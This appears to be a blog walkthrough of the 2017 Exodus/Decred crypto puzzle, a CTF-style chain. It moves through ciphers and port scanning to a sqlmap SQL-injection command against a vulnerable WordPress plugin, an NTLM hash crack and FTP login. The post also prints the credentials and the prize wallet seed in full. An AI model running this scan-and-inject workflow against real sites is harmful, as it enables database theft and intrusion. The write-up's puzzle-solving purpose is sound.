# Decred — Exodus Puzzle Walkthrough

The puzzle begins at the link https://www.exodus.io/decred/

We arrive at an image with two clickable links — one on the computer screen and one above the keyboard. The first leads to a video

showing several enemy ships (7 in total) attempting to attack the player ship but they all get defeated one by one. Each battleship’s shift in motion and bullet fired collectively represent 8 bits ( 0’s for the shifts and 1’s for the bullets fired).

If we use a complete ASCII table (http://www.theasciicode.com.ar), we can decode all the information and arrive at

`0111 1010 – z1001 0111 - ù1000 1010 – è0110 0100 - d0010 1111 - /0111 0110 - v0111 0000 - p`

Now this text as you might guess is ciphered. So here we turn to the image of the keyboard which we discovered earlier on the puzzle homepage (https://www.exodus.io/decred/img/80s-Keyboard-Dark.jpg)

This keyboard is a hint to tell you that the ciphered text can be deciphered on an AZERTY keyboard, with a simple shift to the right. We can do this here. (http://www.dcode.fr/keyboard-shift-cipher)

We get the following results

`azerty →    am-s.coazerty ↑    s)uc9'mazerty ←    e*_f§b^azerty ↓    é^,eLfà`

As you may notice, the first one seems to be a URL. So if we visit that website, we get to a “Protected Site” page with a password prompt for entry.

If you remembered our ciphered text we discovered from the video file, you can enter it to proceed

`zùèd/vp`

Once we enter that password, we arrive at a basic Wordpress site with the following post which sets out some basic rules and gives a couple hints as to what direction not to proceed in. In doing so, it also makes it quite obvious that the next part of the challenge will be to penetrate the site in some way, making it sort of a CTF-style challenge.

`Rules & Code of Conduct `
`Please follow these rules in order to avoid creating obstacles/pitfalls for yourself and others.`
`* PLEASE, no denial of service / resource exhaustion attacks. It will not lead you to anything helpful for this puzzle.`
`*`
`* Thinking about brute forcing logins/passwords?`
`You need to just >>>`
`…….╱¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯╲….╱░.░░░░░░░░░░░░░░░░░░░ ╲.╱░░.░░░░░░░░░░░░░░░░░░░░. .╲|░░░░█▀▀░▀█▀░█▀█░█▀█░░░░░░░░||░░░░▀▀█░░█░░█░█░█▀▀░░░░░░░░||░░░░▀▀▀░░▀░░▀▀▀░▀░░░░░░░░░░|.╲░.░░░░░░░░░░░░░░░░░░░░░░ ╱….╲░.░░░░.░░░░░░░░░░░░░░░╱……¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯`
`This will not help you. Penetrating SSH service is not one of the steps so don’t bother trying.`

A player then continues from reading the instructions and may decide to do a port scan of the website with nmap. If so, he’d get the following results.

`Prasanths-MBP:~ Administrator\$ nmap am-s.co`
`Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-01 14:34 EDT`
`Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan`
`Connect Scan Timing: About 7.85% done; ETC: 14:36 (0:01:10 remaining)`
`Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan`
`Connect Scan Timing: About 12.57% done; ETC: 14:36 (0:01:03 remaining)`
`Nmap scan report for am-s.co (208.77.99.224)`
`Host is up (0.050s latency).`
`rDNS record for 208.77.99.224: server1.adbogie.com`
`Not shown: 981 closed ports`
`PORT     STATE    SERVICE`
`21/tcp   open     ftp`
`22/tcp   open     ssh`
`25/tcp   filtered smtp`
`53/tcp   open     domain`
`80/tcp   open     http`
`110/tcp  open     pop3`
`111/tcp  open     rpcbind`
`135/tcp  filtered msrpc`
`139/tcp  filtered netbios-ssn`
`143/tcp  open     imap`
`443/tcp  open     https`
`445/tcp  filtered microsoft-ds`
`465/tcp  open     smtps`
`587/tcp  open     submission`
`993/tcp  open     imaps`
`995/tcp  open     pop3s`
`3306/tcp open     mysql`
`6667/tcp open     irc`
`7000/tcp open     afs3-fileserver`
`Nmap done: 1 IP address (1 host up) scanned in 22.03 seconds`

It’s interesting to note that ports 21 & 22, FTP & SSH are open, however we know from the blog post that penetrating SSH is not an option but it leaves out FTP. It’s good to remember this information for use further down the puzzle trail. All other ports are basic and don’t give any response. If we progress to do a full nmap scan of the website as the initial one doesn’t scan all the ports, we notice that port 62217 is open and the service is unknown.

`PORT      STATE SERVICE`
`62217/tcp open  unknown`

If we try to connect to the port with a program like netcat, we enter an app running on the port

`Prasanths-MBP:~ Administrator\$ nc am-s.co 62217`
`Hello, my friend!`
`The current time is: 14:37:41`
`XJ NZWZCD LCP XLYJ LD DZXP ZQ JZF XLJ DZZY QTYO, SZHPGPC ESPCP TD L NPCELTY EZBFP ESLE JZF HTWW YPPO EZ RPE ESP CPBFTCPO NSLCLNEPCD EZ QTYTDS ESP CLNP EZ ESP PYO. RZZO WFNV LYO ACPDD ZYHLCO EZ GTNEZCJ!`

The text block that we get looks like some sort of cipher, so if we put it through a caesarian shift cipher and run through all the possible shifts, we eventually get to a deciphered message.

Now notice that one word “TOQUE” seems a little out of place. That’s because its scrambled and is an anagram for “QUOTE.” You should also notice that the application running on port 62217 seems to be accepting input. This should lead you to believe that there is some sort of quote or message you need to enter to get to the next step.

Going back to the video we found at the beginning of the puzzle, if you do some further analysis on the audio of that video, you will notice that there is morse code hidden in it.

This morse decodes to:

“WE DO NOT MERELY DESTROY OUR ENEMIES WE CHANGE THEM”

If you google this quote, you will notice the first link that pops up directs to http://www.shmoop.com/1984/power-quotes-5.html which tells you it’s a quote from from 1984 by George Orwell. If you copy the quote from that website that reads “We do not merely destroy our enemies, we change them.” and paste that into your netcat interaction with the app on port 62217, you will get to the next step. It will return the following.

`XCQaqlM4biiFF==RRAYKbJ61V5Ni0fH8mXRxjCpSzs`
`suEYCRwBWKO3ms9XANQle7sRojZUD6Dpr8rexZJOtm`
`CxLDBaBk51w0C528b5jfeGpuFNKzmWgexhOfduXoh2`
`4hb4bhOx7XS5Xs7faWlfzhBx8HF1MpKCrkWyH3NGko`
`XP1l|tEA|e5KzsGRn2=JoTn6uRyy46Y=0bs1gMEh8e`
`VDKa1Y6OKyC9JcfkcqHyICC7qJCTdm0rbcy06ATG2i`
`tEmgBYqQ6Sd8JbpmT6Xht81Tz442HJvhaKzxXnSIqr`
`sFPIbFw4LbFhyoKnnF6VK0YkjP+H3aYL6A7i81HApf`
`ZI88X6tdyH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rg`
`osmh0h74g3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRG`
`xqLfwRf7YDmNjNEJPfI3c16bX/I5aLX8bcwlX4h4TC`
`RiqXvWVBEO7fxwUUe5cnB201RY2jFOy8tc2cPU+q94`
`bv2ocvROsP2LXwbyR1rmomvFCkAbETxfM9F3jDO7J7`
`WQtQOLYX46xILVJo8iltsAoNpNwlzcX+NlKb8odnEm`
`sepHMEJ9-EAFMuafJ8UzwSeHfPLdYxs3e60k88wjh8|`
`0ycfyTiA5JYzequT8-Wevc3rFJokdXLbw3gFnqz5yH|`
`EohRzFxB4Rv2RqmCrTAmIhlFVZSgNVAR7sQcOCzVHZ|`
`vKUQqKXWklzXS5mt24kLunvQb4dCvGhoQYfI1EPeSY`
`EOz5SM5JlNOcN4z7C‘Acc9V1I53zaOs1oS03D1FkXo|`
`eyiUuJWgn9Jk9qDwKzobzR7yC9pcAK01lBJAeolZ3b|`
`g3gVrmD9cena6INnyWpuBt8A9kOhC6UEEQqkBEM8VI|`
`lkCifs3hegF6bDJ7AEZvssbZoMHywrfhFapxncbW1b`
`SlSTTcoa17gYPp4e+JEyGumhLjSyibmp6pxtOhhdXt|`
`0cShlLmneDRYsYqqIhqd5GliFK7VC6wrYMPc9hctet|`
`ywn0mvQJH9pIoOWA0LM4SEaHg9Om2xaArGy2vWrXEA|`
`40IssqJeuUqD2FuH44MqzETYJkFWmO5IVmTzgPdDLR`
`WbAyLD1oiq7tg4x7obsBYACPUddV1tSiNP+ddswH3Y`
`66tAjAfmICqbebHizUhsJi71WVxugLYwELC/m1b7ca`
`NbH1W8zm5eXHfyaW1HtfLPRJB6gQ8aHGRfF73LKUz9|`
`ZmpiWfSbCRLfmNNQV6caaxV6qOQ6MdME5zDDhOLioY`
`l81tbUNgcTCodzOPTirlql5vYyUcgKIUAxndwVM1JT`
`wnqma5teMwqrOKO24kPNojQXZcvL9w47wF51F2io9J`
`3RMY3N4sCMM2M5MpDDyLcZ8Rc6kMyoDh79KTpsefYv`
`v8hrV7LyQvI7wRIp0D4EMB0t4oUCbdDCeTruLUTvXH|`
`ezYDv9ZLRruskKiBhCxrnCGnMCOq2wfO0QD38BmS7B`
`GD0Kjw83re7jcoo9Noow3ftpf6G3XzoGP6yCuvhkUu`
`3ID5on0KBfi27cHoQ8IK8mwahRd8A==lOL0DwJD0Gk`
`wJUVA1ZiHL0R0gZPBKu3btTDOwI9ytm5dbhmJJQ1vF`
`ZkUNe2CehudTGDhO13l7gNGpf7HFpF0rfKraD2qxX0`
`sIsNZ2ZiuNinFceVMLGWT2MtiSjilo0vLi5Tn9i2Rr`
`WztE56pqrUYUWmwctiZInBvmqWfTlsKxrkUmFEQbm7`
`a7ymkg4w4P7q0ld0pHxA15NA48plzhkyt1CW78p4st`

The next step required some extensive scanning with wpscan or a similar tool to find a vulnerability in the site, and since not much progress was made, a hint (nice joint) was given during the Decred live stream broadcast on Youtube. “Nice joint” is simply an anagram for “injection” as some soon figured out and that should have led you to believe there was an SQL Injection vulnerability in the website. With a little further scanning, you should have noticed that wp-symposium version 14.11, a plugin for Wordpress, was installed and it is known to have an SQL injection vulnerability - https://www.exploit-db.com/exploits/37824/

Now that you know this, you should move to exploit it either by a custom written script or more preferably a program like sqlmap.

You can begin with a simple command like such to begin the process.

`sqlmap -u “http://am-s.co/wp-content/plugins/wp-symposium/get_album_item.php?size=version()%20%3B%20--" —-dbs --level 3`

Once you’ve dumped the entire database, you should notice a table with a unique name not part of the normal Wordpress schema

`wp_ptfacdeeilnrst`

the characters after the underscore as you might notice can be reordered to make “ftpcredentials”

If you proceed to dump the data from this table, you should get the following information

`user_name:  4017B940CAE24016AAD3B435B51404EE`
`user_password: BCA2A84FA7A10EF3F06FA49727B0EAC567928360`

If you examine further, you should notice that “user_name” field seems to contain a hash. It is hashed with NTLMv1.0 which is no longer considered secure, so if you proceed to un-hash, it will come out to “exodus”

As for the user password, you should notice that all the characters in there can be separated into 8 bit hex values.

e.g.

`BC A2 A8 4F A7 A1 0E F3 F0 6F A4 97 27 B0 EA C5 67 92 83 60`

Now if we proceed to convert these to decimal numbers and use those values to correspond to the letter place in the text block that we found earlier, we should get the password.

Here’s a little script that one of the puzzle players @blue_sky_catastrophe on the Decred Slack Channel (http://decred.slack.org) wrote to help do this faster.

`raw_str = """XCQaqlM4biiFF==RRAYKbJ61V5Ni0fH8mXRxjCpSzssuEYCRwBWKO3ms9XANQle7sRojZUD6Dpr8rexZJOtmCxLDBaBk51w0C528b5jfeGpuFNKzmWgexhOfduXoh24hb4bhOx7XS5Xs7faWlfzhBx8HF1MpKCrkWyH3NGkoXP1l|tEA|e5KzsGRn2=JoTn6uRyy46Y=0bs1gMEh8eVDKa1Y6OKyC9JcfkcqHyICC7qJCTdm0rbcy06ATG2itEmgBYqQ6Sd8JbpmT6Xht81Tz442HJvhaKzxXnSIqrsFPIbFw4LbFhyoKnnF6VK0YkjP+H3aYL6A7i81HApfZI88X6tdyH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rgosmh0h74g3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRGxqLfwRf7YDmNjNEJPfI3c16bX/I5aLX8bcwlX4h4TCRiqXvWVBEO7fxwUUe5cnB201RY2jFOy8tc2cPU+q94bv2ocvROsP2LXwbyR1rmomvFCkAbETxfM9F3jDO7J7WQtQOLYX46xILVJo8iltsAoNpNwlzcX+NlKb8odnEmsepHMEJ9-EAFMuafJ8UzwSeHfPLdYxs3e60k88wjh8|0ycfyTiA5JYzequT8-Wevc3rFJokdXLbw3gFnqz5yH|EohRzFxB4Rv2RqmCrTAmIhlFVZSgNVAR7sQcOCzVHZ|vKUQqKXWklzXS5mt24kLunvQb4dCvGhoQYfI1EPeSYEOz5SM5JlNOcN4z7C'Acc9V1I53zaOs1oS03D1FkXo|eyiUuJWgn9Jk9qDwKzobzR7yC9pcAK01lBJAeolZ3b|g3gVrmD9cena6INnyWpuBt8A9kOhC6UEEQqkBEM8VI|lkCifs3hegF6bDJ7AEZvssbZoMHywrfhFapxncbW1bSlSTTcoa17gYPp4e+JEyGumhLjSyibmp6pxtOhhdXt|0cShlLmneDRYsYqqIhqd5GliFK7VC6wrYMPc9hctet|ywn0mvQJH9pIoOWA0LM4SEaHg9Om2xaArGy2vWrXEA|40IssqJeuUqD2FuH44MqzETYJkFWmO5IVmTzgPdDLRWbAyLD1oiq7tg4x7obsBYACPUddV1tSiNP+ddswH3Y66tAjAfmICqbebHizUhsJi71WVxugLYwELC/m1b7caNbH1W8zm5eXHfyaW1HtfLPRJB6gQ8aHGRfF73LKUz9|ZmpiWfSbCRLfmNNQV6caaxV6qOQ6MdME5zDDhOLioYl81tbUNgcTCodzOPTirlql5vYyUcgKIUAxndwVM1JTwnqma5teMwqrOKO24kPNojQXZcvL9w47wF51F2io9J3RMY3N4sCMM2M5MpDDyLcZ8Rc6kMyoDh79KTpsefYvv8hrV7LyQvI7wRIp0D4EMB0t4oUCbdDCeTruLUTvXH|ezYDv9ZLRruskKiBhCxrnCGnMCOq2wfO0QD38BmS7BGD0Kjw83re7jcoo9Noow3ftpf6G3XzoGP6yCuvhkUu3ID5on0KBfi27cHoQ8IK8mwahRd8A==lOL0DwJD0GkwJUVA1ZiHL0R0gZPBKu3btTDOwI9ytm5dbhmJJQ1vFZkUNe2CehudTGDhO13l7gNGpf7HFpF0rfKraD2qxX0sIsNZ2ZiuNinFceVMLGWT2MtiSjilo0vLi5Tn9i2RrWztE56pqrUYUWmwctiZInBvmqWfTlsKxrkUmFEQbm7a7ymkg4w4P7q0ld0pHxA15NA48plzhkyt1CW78p4st"""`
`idxs = [int(c, 16) for c in "BC A2 A8 4F A7 A1 0E F3 F0 6F A4 97 27 B0 EA C5 67 92 83 60".split(" ")]print ''.join([raw_str[i-1] for i in idxs])`

This will give you the password “RrNe3C=TqFWhplHubah1” for the FTP account under the username “exodus”

Once you log in via FTP to the website, you should notice that there is one file to download, called “ee03c8d2493cfad0b9c7ab42722dfa5b.svg”

Here’s what it looks like

This graphical puzzle is the last step before we get an encrypted ciphertext which when we decrypt with a certain key, will lead to the concatenated wallet seed that contains the prize.

To solve this, you must first notice that this is a graphical Dijkstra’s algorithm problem, in which each color in the image has a certain numerical weight associated with it (Orange — 5, Cyan — 2, White-10, Blue-4, Yellow-2, Magenta-3; given by the port service program if you tried to enter the FTP password after the quote) and you must try to find the shortest path between two nodes, starting at the green and ending at the red. Now the way we interpret nodes isn’t by the shapes but rather pixel by pixel.

This will require some basic programming which should give a result similar to the following if you do it correctly. It should also give you a total cost of 328.

Well, now what? The next step is to overlay the block of text on top of this image and see where the path leads!

The next step is to closely make your way down the path, line by line (except those that have | after them) and begin to construct the AES 256 bit encrypted ciphertext. The only exception is that the last line of the cipher text will spill over to start at the beginning and end at “==”

If you do it correctly, you should end up with the following ciphertext

`bFhyoKnnF6VK0YkjP+H3aYL6A7i81HApfH2jLQHXRpu0aW8EFdsCdhYSnhsUNKc7Rg3I9FRv5NQZj2zg0lzjg2+pXAWjR/MFGRG3c16bX/I5aLX8bcwlX4h4TCnB201RY2jFOy8tc2cPU+q94momvFCkAbETxfM9F3jDO7J7NpNwlzcX+NlKb8odnEmQb4dCvGhoQYfI1EPeSYZoMHywrfhFapxncbW1b5IVmTzgPdDLRSiNP+ddswH3YYwELC/m1b7ca5zDDhOLioYAxndwVM1JTwF51F2io9J79KTpsefYv8BmS7BuvhkUu3ID5on0KBfi27cHoQ8IK8mwahRd8A==`

Now if you use the total cost calculation that we got from finding the least cost path for this maze, “three hundred and twenty eight” as the key to decrypt this ciphertext, you will get the wallet seed!

`virusguitaristswelterBradburyoffloadinertianecklaceembezzletroubletypewriterdropperGalvestonrockerunicornstairwaymicrowavestaplertravestyAthenssurrenderdrumbeateverydaychatterbusinessmanmusicmonumentsoybeanracketeerZulucompanyZulutruncatednecklace`

CREDITS:

These are the handles of the users from the Decred Slack Channel who helped solve critical parts of the puzzle.

@grubana & @narcelio — morse code from the video
@johnnyjorege & @pandac — binary from the video & deciphering the result
@yash — password entry on the website
@johnnyjorege scanning and discovering app on port 62217
@pandac deciphering text from port service
@pandac , @blue_sky_catastrophe inputting quote found from morse earlier
@sham791 —figured out how to dump data from SQLi vulnerability
@blue_sky_catastrophe & @johnnyjorege for getting the FTP password from the block of text
@africanalex — figuring out to start at green, end at red for puzzle image
@sham791 — for discovering the wallet seed

Like what you read? Give Prasanth Venigalla a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.